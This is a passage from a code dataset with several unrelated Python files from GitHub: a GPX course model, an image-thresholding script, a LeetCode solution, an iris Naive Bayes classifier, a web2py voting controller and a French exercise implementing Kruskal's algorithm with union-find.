Bény/squid.py","file_name":"squid.py","file_ext":"py","file_size_in_byte":22997,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"}
{"seq_id":"9061567607","text":"class Course:\n\n    def __init__(self, name):\n        self.name = name\n        self.distance = 0\n        self.ascent = 0\n        self.descent = 0\n        self.segments = []\n        self._reset_metrics()\n\n    def _reset_metrics(self):\n        self.labels = []\n        self.distances = []\n        self.ascents = []\n        self.descents = []\n        self.steepnesses = []\n        self.elevations = []\n        self.elevation_labels = []\n\n    def add_segment(self, segment):\n        self.segments.append(segment)\n        self._update_from_segments()\n\n    def add_segments(self, segments):\n        for s in segments:\n            self.add_segment(s)\n\n    def _update_from_segments(self):\n        self._reset_metrics()\n        for i, s in enumerate(self.segments):\n            self.labels.append(s.label)\n            self.distances.append(s.distance)\n            self.ascents.append(s.ascent)\n            self.descents.append(s.descent)\n            self.steepnesses.append(s.steepness)\n            self.elevations.extend(s.elevation)\n            self.elevation_labels.extend([i] * len(s.elevation))\n        self.distance = sum(self.distances)\n        self.ascent = sum(self.ascents)\n        self.descent = sum(self.descents)\n","repo_name":"sudoale/gpx_stats","sub_path":"src/models/course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"74229301602","text":"import cv2\n\n\ndef colour_to_bw(original_image_path, output_path):\n    '''\n    Function to convert colour image to black and white\n    '''\n    original_image = cv2.imread(original_image_path)\n    gray_img = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)\n    thresh = 128\n    img_bw = cv2.threshold(gray_img, thresh, 
255, cv2.THRESH_BINARY)[1]\n cv2.imwrite(output_path + 'final_image.png', img_bw)\n","repo_name":"python-geeks/Automation-scripts","sub_path":"colorimage_bw/colour_to_bw.py","file_name":"colour_to_bw.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":719,"dataset":"github-code","pt":"54"} +{"seq_id":"32627299159","text":"from math import comb\nclass Solution:\n def numIdenticalPairs(self, nums: List[int]) -> int:\n hashmap = {}\n for i in nums:\n if i in hashmap:\n hashmap[i] += 1\n else:\n hashmap[i] = 1\n \n pairs = 0 \n for i in hashmap.values():\n pairs += comb(i,2)\n \n return pairs\n","repo_name":"nahubn1/Competitive-programing","sub_path":"Number of Good Pairs.py","file_name":"Number of Good Pairs.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31350036180","text":"from random import *\r\nimport numpy as np\r\nimport random\r\nimport sklearn\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn import datasets as ds\r\nfrom sklearn.datasets import (load_iris,make_classification)\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.datasets import make_regression\r\nimport seaborn as sns\r\nfrom mlxtend import plotting as pl\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.decomposition import PCA\r\n\r\n\r\n#from sklearn.model_selection import train_test_split\r\niris = sklearn.datasets.load_iris()\r\n\r\ndef p(*priI_Inted):\r\n for I_I in priI_Inted:\r\n print(I_I)\r\n\r\n\r\n\r\nclass datapoint:\r\n dt = 0.0\r\n lab = 0.0\r\n\r\n#x_train,x_test,y_train,y_test\r\ndef Split(Data,Labels,testRatio,valRatio):\r\n N = len(Data)\r\n \r\n testSize = int(testRatio*N)\r\n valSize = int(valRatio*N)\r\n allData = []\r\n\r\n \r\n\r\n for i in range(0,N):\r\n x = datapoint()\r\n x.dt = np.array([Data[i][0],Data[i][1],Data[i][2],Data[i][3]],dtype=float)\r\n x.lab = Labels[i]\r\n allData.append(x)\r\n\r\n\r\n random.seed(7)\r\n random.shuffle(allData)\r\n \r\n \r\n trainSize = N - (testSize+valSize)\r\n\r\n\r\n\r\n #p(trainSize)\r\n x_train = np.zeros((trainSize,4),dtype=float)\r\n y_train = np.zeros((trainSize),dtype=int)\r\n \r\n x_val = np.zeros((valSize,4),dtype=float)\r\n y_val = np.zeros((valSize),dtype=int)\r\n\r\n x_test = np.zeros((testSize,4),dtype=float)\r\n y_test = np.zeros((testSize),dtype=int)\r\n \r\n i = 0\r\n c = 0\r\n while i < testSize:\r\n x_test[c] = allData[i].dt\r\n y_test[c] = allData[i].lab\r\n i = i + 1\r\n c = c + 1\r\n\r\n c = 0\r\n while i < testSize + valSize:\r\n x_val[c] = allData[i].dt\r\n y_val[c] = allData[i].lab\r\n i = i + 1\r\n c = c + 1\r\n\r\n c = 0\r\n while i < N:\r\n x_train[c] = allData[i].dt\r\n y_train[c] = allData[i].lab\r\n i = i + 1\r\n c = c + 1\r\n return x_train,x_test,x_val,y_val,y_train,y_test\r\n\r\n\r\ndef calculate_accuracy(predicted_y , y):\r\n sum = 0\r\n l = len(y)\r\n for i in range(0,l):\r\n if predicted_y[i] == y[i]: \r\n sum += 1\r\n\r\n return float(100*sum/l)\r\n \r\n\r\nData = iris.data\r\nLabels = iris.target\r\n\r\n\r\n\r\nx_train,x_test,x_val,y_val,y_train,y_test = Split(Data,Labels,0.30,0.30)\r\n\r\n\r\nclf = GaussianNB()\r\n\r\nclf.fit(x_train,y_train)\r\n\r\n\r\npredicted_y = clf.predict(x_test)\r\n\r\naccuracy = calculate_accuracy(predicted_y,y_test)\r\n\r\n\r\np(accuracy)\r\n\r\n\r\n \r\npca = 
PCA(n_components=2)\r\n\r\n\r\nxx = pca.fit_transform(x_train)\r\nclf.fit(xx,y_train)\r\npl.plot_decision_regions(xx, y_train, clf=clf)\r\nplt.show()","repo_name":"abdallahMohsen3162/machine-learning","sub_path":"classification/iris prediction.py","file_name":"iris prediction.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"18071596183","text":"# -*- coding: utf-8 -*-\n# -------------------------------------------------------------------------\n# This is a sample controller\n# this file is released under public domain and you can use without limitations\n# -------------------------------------------------------------------------\n\n# ---- example index page ----\ndef index():\n    projects = db(Project).select()\n\n    return dict(projects=projects)\n\n\n@auth.requires_login()\ndef proj_detail():\n    projId = request.args[0]\n    projData = db(Project.id == projId).select().first()\n    you_vote = db((Vote.project == projId)&(Vote.created_by == auth.user_id)&(Vote.vote != None)).select(Vote.id, Vote.vote).first()\n    y_vote = db((Vote.project == projId)&(Vote.vote == True)).count()\n    n_vote = db((Vote.project == projId)&(Vote.vote == False)).count()\n\n    return dict(projData=projData, you_vote=you_vote,\n                y_vote=y_vote, n_vote=n_vote,\n                )\n\n\n@auth.requires_login()\ndef yes_vote():\n    projId = request.args[0]\n    Vote.update_or_insert((Vote.project==projId)&(Vote.created_by==auth.user_id),\n                          project=projId, vote=True)\n    session.flash = 'You voted Yes!'\n    redirect(URL('default', 'proj_detail', args=projId))\n\n\n@auth.requires_login()\ndef no_vote():\n    projId = request.args[0]\n    Vote.update_or_insert((Vote.project==projId)&(Vote.created_by==auth.user_id),\n                          project=projId, vote=False)\n    session.flash = 'You voted No!'\n    redirect(URL('default', 'proj_detail', args=projId))\n\n\n@auth.requires_login()\ndef neutral_vote():\n    voteId = request.args[0]\n    projId = request.args[1]\n    db((Vote.id==voteId)&(Vote.created_by==auth.user_id)).update(vote=None)\n    redirect(URL('default', 'proj_detail', args=projId))\n\n\n# ---- API (example) -----\n@auth.requires_login()\ndef api_get_user_email():\n    if not request.env.request_method == 'GET': raise HTTP(403)\n    return response.json({'status':'success', 'email':auth.user.email})\n\n\n# ---- Smart Grid (example) -----\n# @auth.requires_membership('admin') # can only be accessed by members of the admin group\ndef grid():\n    response.view = 'generic.html' # use a generic view\n    tablename = request.args(0)\n    if not tablename in db.tables: raise HTTP(403)\n    grid = SQLFORM.smartgrid(db[tablename], args=[tablename], deletable=False, editable=False)\n    return dict(grid=grid)\n\n\n# ---- Embedded wiki (example) ----\ndef wiki():\n    auth.wikimenu() # add the wiki to the menu\n    return auth.wiki() \n\n\n# ---- Action for login/register/etc (required for auth) -----\ndef user():\n    \"\"\"\n    exposes:\n    http://..../[app]/default/user/login\n    http://..../[app]/default/user/logout\n    http://..../[app]/default/user/register\n    http://..../[app]/default/user/profile\n    http://..../[app]/default/user/retrieve_password\n    http://..../[app]/default/user/change_password\n    http://..../[app]/default/user/bulk_register\n    use @auth.requires_login()\n        @auth.requires_membership('group name')\n        @auth.requires_permission('read','table name',record_id)\n    to decorate functions that need access control\n    also notice there is http://..../[app]/appadmin/manage/auth to allow administrator to manage users\n    \"\"\"\n
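    # auth() dispatches on request.args(0), so this single action serves every\n    # login/logout/register/profile route listed in the docstring above.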
    return dict(form=auth())\n\n\n# ---- action to serve uploaded static content (required) ---\n@cache.action()\ndef download():\n    \"\"\"\n    allows downloading of uploaded files\n    http://..../[app]/default/download/[filename]\n    \"\"\"\n    return response.download(request, db)\n","repo_name":"volneyrock/VisaoParlamentar","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"72517987680","text":"'''\nAuthor: ThearchyHelios\nDate: 2022-10-18 13:34:31\nLastEditTime: 2022-11-04 18:17:27\nLastEditors: ThearchyHelios\nDescription: \nFilePath: /INF303/TP3/tp.py\n'''\n###########################################\n### TP3 - Minimum weight spanning trees ###\n###########################################\n\nimport copy\nimport time\nfrom lib.graphe import Graphe\nfrom lib.tasbinomial import TasBinomial\n\n\"\"\"\nFunctions whose documentation contains OBLIGATOIRE are required to get the\npoint for the TP. The examples given also serve as unit tests if the file is\nexecuted.\n\nHow to do the TPs:\n* Download and extract the TP archive.\n* Open the file « tp.py » in your favourite text editor.\n* Complete the functions one by one between the lines « ### À COMPLÉTER DÉBUT »\nand « ### À COMPLÉTER FIN ».\n* When you think a function is finished, run the file on your machine and\ncheck that the unit tests pass. If they do not, fix your function.\n* When the unit tests pass for a function, copy-paste the complete file to\nCaseine in the \"Edit\" tab, save, and check that it works on Caseine with the\n\"Evaluate\" button.\n\nFor any remark about the TP itself (instructions that are not clear enough,\nbugs, code that works locally but not on Caseine, insufficient test sets,\ninteresting questions to add, spelling...), contact\nFlorian Fontan florian.fontan@grenoble-inp.fr\n
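\nThe examples in the docstrings below are standard doctest sessions; as an\nillustration (this note is not part of the original statement), they can also be\nrun directly with 'python3 -m doctest tp.py', which prints nothing when every\nexample passes.\n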
\nWarning: the provided tests cannot be exhaustive. A function passing all the\ntests does not guarantee that it is correct. Keep that in mind\nwhen you reuse your functions in other functions.\n\n---\n\nIn this TP, the graphs are graphs with weights on the edges.\nRemember to look at the documentation and examples of the Graphe class,\nespecially for the methods __init__, ajouter_arete and voisins_avec_poids.\n\"\"\"\n\n\n##################################\n### Reverse Kruskal algorithm ###\n##################################\n\ndef graphe_1():\n    \"\"\"Returns the graph (Graphe) G1.\n\n    -------------------\n    --- OBLIGATOIRE ---\n    -------------------\n\n            2\n           /|\n          / |\n         /  |\n       2/   | 3      G1\n       /    |\n      /     |\n     /      |\n    0-------1-------3\n        1       4\n\n    :Examples:\n\n    >>> graphe_1()\n    {4: 0-1-1 0-2-2 1-3-2 1-4-3}\n\n    \"\"\"\n\n    # À COMPLÉTER DÉBUT (1 ligne(s))\n    return Graphe(4, [(0, 1, 1), (0, 2, 2), (1, 2, 3), (1, 3, 4)])\n\n    # À COMPLÉTER FIN\n\n\ndef graphe_2():\n    \"\"\"Returns the graph (Graphe) G2.\n\n    -------------------\n    --- OBLIGATOIRE ---\n    -------------------\n\n         11\n    0--------1\n    |\\      /|\n    | \\10 9/ |\n    |  \\  /  |\n    |   \\/   |\n    |1  /\\  4|     G2\n    |  /  \\  |\n    | /    \\ |\n    |/      \\|\n    2--------3\n         3\n\n    :Examples:\n\n    >>> graphe_2()\n    {4: 0-11-1 0-1-2 0-10-3 1-9-2 1-4-3 2-3-3}\n\n    \"\"\"\n\n    # À COMPLÉTER DÉBUT (1 ligne(s))\n    return Graphe(4, [(0, 1, 11), (0, 2, 1), (0, 3, 10), (1, 2, 9), (1, 3, 4), (2, 3, 3)])\n    # À COMPLÉTER FIN\n\n\ndef graphe_3(n):\n    \"\"\"Returns a graph with n vertices such that there is an edge between i and j\n    if and only if |j-i| <= 2, and the weight of the edge (ij) is i+j.\n\n    -------------------\n    --- OBLIGATOIRE ---\n    -------------------\n\n         4\n     1-------3-----\n    / \\     / \\\n  1/  3\\  5/  7\\   etc      G3\n  /    \\ /    \\ /\n 0-------2-------4\n     2       6\n\n    :param n: Number of vertices, a natural number greater than or equal to 3\n\n    :Examples:\n\n    >>> graphe_3(3)\n    {3: 0-1-1 0-2-2 1-3-2}\n    >>> graphe_3(4)\n    {4: 0-1-1 0-2-2 1-3-2 1-4-3 2-5-3}\n    >>> graphe_3(5)\n    {5: 0-1-1 0-2-2 1-3-2 1-4-3 2-5-3 2-6-4 3-7-4}\n\n    \"\"\"\n\n    # À COMPLÉTER DÉBUT (6 ligne(s))\n    graphe_3_aux = Graphe(n)\n    for i in range(n):\n        for j in range(i+1, n):\n            if abs(i-j) <= 2:\n                graphe_3_aux.ajouter_arete(i, j, i+j)\n    return graphe_3_aux\n    # À COMPLÉTER FIN\n\n\ndef aretes_triees(g: Graphe):\n    \"\"\"Returns the list of edges of g sorted by increasing weight.\n\n    The edges (uv) are such that u < v.\n\n    -------------------\n    --- OBLIGATOIRE ---\n    -------------------\n\n    :Examples:\n\n    >>> aretes_triees(graphe_1())\n    [(0, 1, 1), (0, 2, 2), (1, 2, 3), (1, 3, 4)]\n    >>> aretes_triees(graphe_2())\n    [(0, 2, 1), (2, 3, 3), (1, 3, 4), (1, 2, 9), (0, 3, 10), (0, 1, 11)]\n\n\n    \"\"\"\n\n    # To sort a list l of tuples by their ith component:\n    # >>> l.sort(key=lambda t: t[i])\n\n    # À COMPLÉTER DÉBUT (7 ligne(s))\n    aretes = []\n    for u in range(g.nombre_sommets()):\n        for v, p in g.voisins_avec_poids(u):\n            if u < v:\n                aretes.append((u, v, p))\n    aretes.sort(key=lambda t: t[2])\n    return aretes\n    # À COMPLÉTER FIN\n
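\n\n# A quick illustration (not part of the original statement): on graphe_2(), the two\n# cheapest edges are (0, 2, 1) and (2, 3, 3), so they are the first ones a\n# Kruskal-style algorithm examines.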
[(0, 1), (1, 2), (2, 3)]))\n False\n >>> est_connexe(Graphe(5, [(i, j) for i in range(0, 4) for j in range(i+1, 4)]))\n False\n >>> est_connexe(Graphe(6, [(i, j) for i in range(0, 5) for j in range(i+1, 5)]))\n False\n >>> est_connexe(Graphe(6, [(0, 1), (0, 2), (1, 2), (3, 4), (4, 5), (3, 5)]))\n False\n >>> est_connexe(Graphe(8,\n ... [(i, j) for i in range(0, 4) for j in range(i+1, 4)] +\n ... [(i, j) for i in range(4, 8) for j in range(i+1, 8)]))\n ...\n False\n\n \"\"\"\n\n # Si vous aviez déjà implémenté cette fonction au TP précédent, vous pouvez\n # réutiliser votre code.\n\n # À COMPLÉTER DÉBUT (12 ligne(s))\n # Parcours en profondeur itératif : une pile explicite (plutôt que la\n # récursion) évite de dépasser la limite de récursion de Python sur les\n # grands graphes (p. ex. graphe_3(4096) utilisé plus bas).\n vus = {0}\n pile = [0]\n while pile:\n u = pile.pop()\n for v in g.voisins(u):\n if v not in vus:\n vus.add(v)\n pile.append(v)\n return len(vus) == g.nombre_sommets()\n\n # À COMPLÉTER FIN\n\n\ndef kruskal_inverse(g: Graphe):\n \"\"\"Retourne un arbre couvrant de poids minimum du graphe g en utilisant\n l'algorithme de Kruskal inverse.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param g: un graphe (Graphe) connexe\n :return: un couple (t, l) où\n * t est un arbre (Graphe) couvrant de poids minimum de g\n * l est la liste telle que l[i] est l'arête retirée à l'itération i\n (None si aucune arête n'est retirée)\n\n :Examples:\n\n >>> kruskal_inverse(graphe_1())\n ({4: 0-1-1 0-2-2 1-4-3}, [None, (1, 2)])\n >>> kruskal_inverse(graphe_2())\n ({4: 0-1-2 1-4-3 2-3-3}, [(0, 1), (0, 3), (1, 2)])\n >>> kruskal_inverse(graphe_3(4))\n ({4: 0-1-1 0-2-2 1-4-3}, [(2, 3), None, (1, 2)])\n >>> kruskal_inverse(graphe_3(5))\n ({5: 0-1-1 0-2-2 1-4-3 2-6-4}, [(3, 4), None, (2, 3), None, (1, 2)])\n\n \"\"\"\n\n n = g.nombre_sommets()\n t = copy.copy(g)\n l = []\n ### À COMPLÉTER DÉBUT (10 ligne(s))\n # On examine les arêtes par poids décroissant : une arête est retirée si\n # le graphe reste connexe, sinon elle est réintégrée ; on s'arrête dès que\n # t est un arbre (n-1 arêtes), d'où les listes l plus courtes des exemples.\n aretes = aretes_triees(t)\n aretes.reverse()\n for u, v, poids in aretes:\n t.supprimer_arete(u, v)\n if est_connexe(t):\n l.append((u, v))\n else:\n t.ajouter_arete(u, v, poids)\n l.append(None)\n if t.nombre_aretes() == n-1:\n return t, l\n return t, l\n\n # À COMPLÉTER FIN\n\n\n#############################\n### Algorithme de Kruskal ###\n#############################\n\n########################################################\n### Union-Find : Implémentation utilisant un tableau ###\n########################################################\n\n# Pour implémenter la version classique de l'algorithme de Kruskal, nous allons\n# utiliser une structure UNION-FIND que nous allons implémenter.\n# On numérote les composantes connexes de la forêt courante. Au début de\n# l'algorithme, comme il n'y a pas encore d'arête, chaque sommet est seul dans\n# sa composante connexe. 
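(Illustration ajoutée : les fonctions ufl_creer, ufl_find et ufl_union définies plus bas réalisent exactement cela — ufl_creer(4) donne [0, 1, 2, 3] ; après ufl_union(uf, 0, 1), on obtient [0, 0, 2, 3] et ufl_find(uf, 1) vaut 0.)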
Si lorsque l'on examine l'arête (uv), u et v\n# appartiennent à la même composante connexe, alors on n'ajoute pas l'arête,\n# sinon on l'ajoute et on met à jour notre structure pour fusionner les\n# composantes connexes de u et de v.\n\n# Pour la première implémentation de la structure UNION-FIND, nous allons\n# utiliser un tableau T (une liste en Python) tel que T[i] est l'indice de la\n# composante connexe à laquelle le sommet i appartient.\n\ndef ufl_creer(n):\n \"\"\"Retourne la structure UNION-FIND initialisée.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param n: Nombre de sommets, entier naturel\n\n :Examples:\n\n >>> ufl_creer(2)\n [0, 1]\n >>> ufl_creer(5)\n [0, 1, 2, 3, 4]\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (1 ligne(s))\n return [i for i in range(n)]\n # À COMPLÉTER FIN\n\n\ndef ufl_find(l, v):\n \"\"\"Retourne l'indice de la composante connexe du sommet v dans la structure\n UNION-FIND l.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param v: Un indice d'un sommet, entier naturel compris entre 0 et n-1.\n\n :Examples:\n\n >>> l = [0, 0, 1, 0, 2, 3, 4]\n >>> ufl_find(l, 1)\n 0\n >>> ufl_find(l, 6)\n 4\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (1 ligne(s))\n return l[v]\n # À COMPLÉTER FIN\n\n\ndef ufl_union(l, i, j):\n \"\"\"Fusionne les composantes connexes d'indice i et j dans la structure\n UNION-FIND l.\n\n L'indice de la nouvelle composante connexe est min(i,j).\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param i: Un indice d'une composante connexe, i in l\n :param j: Un indice d'une composante connexe, j in l, j != i\n\n :Examples:\n\n >>> l = [0, 0, 1, 0, 2, 4, 4]\n >>> ufl_union(l, 1, 0)\n >>> l\n [0, 0, 0, 0, 2, 4, 4]\n >>> ufl_union(l, 4, 2)\n >>> l\n [0, 0, 0, 0, 2, 2, 2]\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (3 ligne(s))\n if i > j:\n i, j = j, i\n for k in range(len(l)):\n if l[k] == j:\n l[k] = i\n # À COMPLÉTER FIN\n\n\ndef kruskal_ufl(g: Graphe):\n \"\"\"Retourne un arbre couvrant de poids minimum du graphe g en utilisant\n l'algorithme de Kruskal avec la structure UNION-FIND utilisant un tableau.\n\n -------------------\n --- OBLIGATOIRE ---\n -------------------\n\n :param g: un graphe (Graphe) connexe\n :return: un couple (t, l) où\n * t est un arbre (Graphe) couvrant de poids minimum de g\n * l est la liste telle que l[i] est l'arête ajoutée à l'itération i\n (None si aucune arête n'est ajoutée)\n\n :Examples:\n\n >>> kruskal_ufl(graphe_1())\n ({4: 0-1-1 0-2-2 1-4-3}, [(0, 1), (0, 2), None, (1, 3)])\n >>> kruskal_ufl(graphe_2())\n ({4: 0-1-2 1-4-3 2-3-3}, [(0, 2), (2, 3), (1, 3)])\n >>> kruskal_ufl(graphe_3(4))\n ({4: 0-1-1 0-2-2 1-4-3}, [(0, 1), (0, 2), None, (1, 3)])\n >>> kruskal_ufl(graphe_3(5))\n ({5: 0-1-1 0-2-2 1-4-3 2-6-4}, [(0, 1), (0, 2), None, (1, 3), None, (2, 4)])\n\n \"\"\"\n\n n = g.nombre_sommets()\n t = Graphe(n)\n uf = ufl_creer(n)\n l = []\n\n # À COMPLÉTER DÉBUT (13 ligne(s))\n aretes = aretes_triees(g)\n for u, v, poids in aretes:\n i = ufl_find(uf, u)\n j = ufl_find(uf, v)\n if i != j:\n t.ajouter_arete(u, v, poids)\n l.append((u, v))\n ufl_union(uf, i, j)\n else:\n l.append(None)\n # Supprime les None de fin : les itérations après la dernière arête\n # ajoutée ne font pas partie du résultat attendu.\n while l and l[-1] is None:\n l.pop()\n return t, l\n\n # À COMPLÉTER FIN\n\n\n########################################################\n### Union-Find : Implémentation utilisant des forêts ###\n########################################################\n\n# Essayons de lancer l'algorithme écrit précédemment sur un graphe avec un\n# nombre élevé de sommets.\n# Décommentez 
les lignes suivantes et exécutez votre programme :\n\n\"\"\"\nt0 = time.time()\n\nkruskal_ufl(graphe_3(4096)) # 0.62s sur ma machine (Intel Core i5)\nt1 = time.time()\nprint(\"KRUSKAL_UFL: \", round(t1-t0, 2), \"s\", sep=\"\")\n\nquit()\n\"\"\"\n\n# (Vous pouvez ensuite les commenter à nouveau)\n# On constate qu'il faut plus d'une demi-seconde pour que l'algorithme se\n# termine. En fait, ce sont les appels à la fonction union qui prennent le plus\n# de temps lors de l'exécution. En effet, lors de l'appel de cette fonction, il\n# faut parcourir la liste en entier. Dans l'implémentation suivante, cette\n# fonction ne demande que log(n) opérations, voire moins (en contrepartie, la\n# fonction find demandera quant à elle un peu plus d'opérations).\n# Pour les détails, lisez l'article consacré sur Wikipédia :\n# https://fr.wikipedia.org/wiki/Union-find#Impl%C3%A9mentation_utilisant_des_for%C3%AAts\n# Pensez à bien implémenter toutes les optimisations proposées.\n\n\ndef uff_creer(n):\n \"\"\"Retourne la structure UNION-FIND initialisée.\n\n La structure est une liste de n couples tels que le premier élément du\n couple i indique le parent de l'élément i (ou i si l'élément est la\n racine), et si l'élément i est la racine, le second élément indique le\n rang de l'ensemble i.\n\n :param n: Nombre de sommets, entier naturel\n\n :Examples:\n\n >>> uff_creer(2)\n [[0, 0], [1, 0]]\n >>> uff_creer(5)\n [[0, 0], [1, 0], [2, 0], [3, 0], [4, 0]]\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (1 ligne(s))\n return [[i, 0] for i in range(n)]\n\n # À COMPLÉTER FIN\n\n\ndef uff_find(l, v):\n \"\"\"Retourne l'indice de la composante connexe du sommet v dans la structure\n UNION-FIND l.\n\n Implémente la compression de chemin comme illustré dans les exemples\n ci-dessous.\n\n :param v: Un indice d'un sommet, entier naturel compris entre 0 et n-1.\n\n :Examples:\n\n 0(3)\n /|\\\n / | \\\n / | \\\n 1(0) 2(1) 4(2)\n | | \\\n | | \\\n | | \\\n 3(0) 5(0) 6(1)\n |\n |\n |\n 7(0)\n\n >>> l = [[0, 3], [0, 0], [0, 1], [2, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n >>> uff_find(l, 0)\n 0\n >>> l # non modifiée\n [[0, 3], [0, 0], [0, 1], [2, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n\n >>> uff_find(l, 1)\n 0\n >>> l # non modifiée\n [[0, 3], [0, 0], [0, 1], [2, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n\n >>> uff_find(l, 4)\n 0\n >>> l # non modifiée\n [[0, 3], [0, 0], [0, 1], [2, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n\n >>> uff_find(l, 3)\n 0\n >>> l # Le nœud 3 n'est plus fils du nœud 2 mais de la racine 0.\n [[0, 3], [0, 0], [0, 1], [0, 0], [0, 2], [4, 0], [4, 1], [6, 0]]\n\n 0(3)\n .\n .\n .\n 1(0) 2(1) 3(0) 4(2)\n | \\\n | \\\n | \\\n 5(0) 6(1)\n |\n |\n |\n 7(0)\n\n >>> uff_find(l, 7)\n 0\n >>> l # Les nœuds 6 et 7 deviennent des fils de la racine.\n [[0, 3], [0, 0], [0, 1], [0, 0], [0, 2], [4, 0], [0, 1], [0, 0]]\n\n 0(3)\n .\n .\n .\n 1(0) 2(1) 3(0) 4(2) 6(1) 7(0)\n |\n |\n |\n 5(0)\n\n\n \"\"\"\n\n # À COMPLÉTER DÉBUT (3 ligne(s))\n if l[v][0] != v:\n l[v][0] = uff_find(l, l[v][0])\n return l[v][0]\n\n # À COMPLÉTER FIN\n\n\ndef uff_union(l, i, j):\n \"\"\"Fusionne les composantes connexes d'indice i et j dans la structure\n UNION-FIND l.\n\n Si les composantes d'indice i et j ont même rang, alors la racine\n de l'union est la racine de i.\n\n :param i: Un indice d'une composante connexe, i in l\n :param j: Un indice d'une composante connexe, j in l, j != i\n\n :Examples:\n\n rang(i) != rang(j)\n\n 1(1) 2(0) 1(1)\n | -> / \\\n | / \\\n 0(0) 0(1) 2(0)\n\n >>> l = [[1, 0], [1, 1], [2, 0]]\n >>> uff_union(l, 1, 2)\n >>> l\n [[1, 0], 
[1, 1], [1, 0]]\n\n 2(1) 1(0) 2(1)\n | -> / \\\n | / \\\n 0(0) 0(1) 1(0)\n\n >>> l = [[2, 0], [1, 0], [2, 1]]\n >>> uff_union(l, 1, 2)\n >>> l\n [[2, 0], [2, 0], [2, 1]]\n\n rang(i) == rang(j)\n\n 1(1) 2(1) uff_union(1, 2) 1(2)\n | | -> / \\\n | | / \\\n 0(0) 3(0) 0(0) 2(1)\n |\n |\n 3(0)\n\n >>> l = [[1, 0], [1, 1], [2, 1], [2, 0]]\n >>> uff_union(l, 1, 2)\n >>> l\n [[1, 0], [1, 2], [1, 1], [2, 0]]\n\n 1(1) 2(1) uff_union(2, 1) 2(2)\n | | -> / \\\n | | / \\\n 0(0) 3(0) 3(0) 1(1)\n |\n |\n 0(0)\n\n >>> l = [[1, 0], [1, 1], [2, 1], [2, 0]]\n >>> uff_union(l, 2, 1)\n >>> l\n [[1, 0], [2, 1], [2, 2], [2, 0]]\n\n \"\"\"\n\n ri = l[i][1]\n rj = l[j][1]\n\n # À COMPLÉTER DÉBUT (7 ligne(s))\n if ri > rj:\n l[j][0] = i\n elif ri < rj:\n l[i][0] = j\n else:\n l[j][0] = i\n l[i][1] += 1\n\n # À COMPLÉTER FIN\n\n\ndef kruskal_uff(g: Graphe):\n \"\"\"Retourne un arbre couvrant de poids minimum du graphe g en utilisant\n l'algorithme de Kruskal avec la structure UNION-FIND utilisant des forêts.\n\n :param g: un graphe (Graphe) connexe\n :return: un couple (t, l) où\n * t est un arbre (Graphe) couvrant de poids minimum de g\n * l est la liste telle que l[i] est l'arête ajoutée à l'itération i\n (None si aucune arête n'est ajoutée)\n\n :Examples:\n\n >>> kruskal_uff(graphe_1())\n ({4: 0-1-1 0-2-2 1-4-3}, [(0, 1), (0, 2), None, (1, 3)])\n >>> kruskal_uff(graphe_2())\n ({4: 0-1-2 1-4-3 2-3-3}, [(0, 2), (2, 3), (1, 3)])\n >>> kruskal_uff(graphe_3(4))\n ({4: 0-1-1 0-2-2 1-4-3}, [(0, 1), (0, 2), None, (1, 3)])\n >>> kruskal_uff(graphe_3(5))\n ({5: 0-1-1 0-2-2 1-4-3 2-6-4}, [(0, 1), (0, 2), None, (1, 3), None, (2, 4)])\n >>> kruskal_uff(Graphe(7, [(0, 1, 1), (1, 2, 2), (3, 4, 3), (2, 4, 4), (0, 2, 5), (3, 5, 7), (0, 5, 6), (0, 6, 10)]))\n ({7: 0-1-1 0-6-5 0-10-6 1-2-2 2-4-4 3-3-4}, [(0, 1), (1, 2), (3, 4), (2, 4), None, (0, 5), None, (0, 6)])\n\n \"\"\"\n\n n = g.nombre_sommets()\n uf = uff_creer(n)\n t = Graphe(n)\n l = []\n\n # À COMPLÉTER DÉBUT (13 ligne(s))\n # Important : uff_union doit être appelée sur les RACINES i et j (et non\n # sur u et v eux-mêmes), sinon une ancienne racine peut rester orpheline\n # et la structure se désynchronise ; on s'arrête dès que l'arbre possède\n # n-1 arêtes, d'où les listes l plus courtes de certains exemples.\n aretes = aretes_triees(g)\n for u, v, poids in aretes:\n if t.nombre_aretes() == n-1:\n break\n i = uff_find(uf, u)\n j = uff_find(uf, v)\n if i != j:\n t.ajouter_arete(u, v, poids)\n uff_union(uf, i, j)\n l.append((u, v))\n else:\n l.append(None)\n\n # À COMPLÉTER FIN\n\n return (t, l)\n\n# Décommentez les lignes suivantes pour comparer la différence de temps\n# d'exécution entre les deux implémentations de la structure UNION-FIND:\n\n\n\"\"\"\nt0 = time.time()\nn = 4096\ng = graphe_3(n)\n\nkruskal_ufl(g) # 0.62s sur ma machine (Intel Core i5)\nt1 = time.time()\nprint(\"KRUSKAL_UFL: \", round(t1-t0, 2), \"s\", sep=\"\")\n\nkruskal_uff(g) # 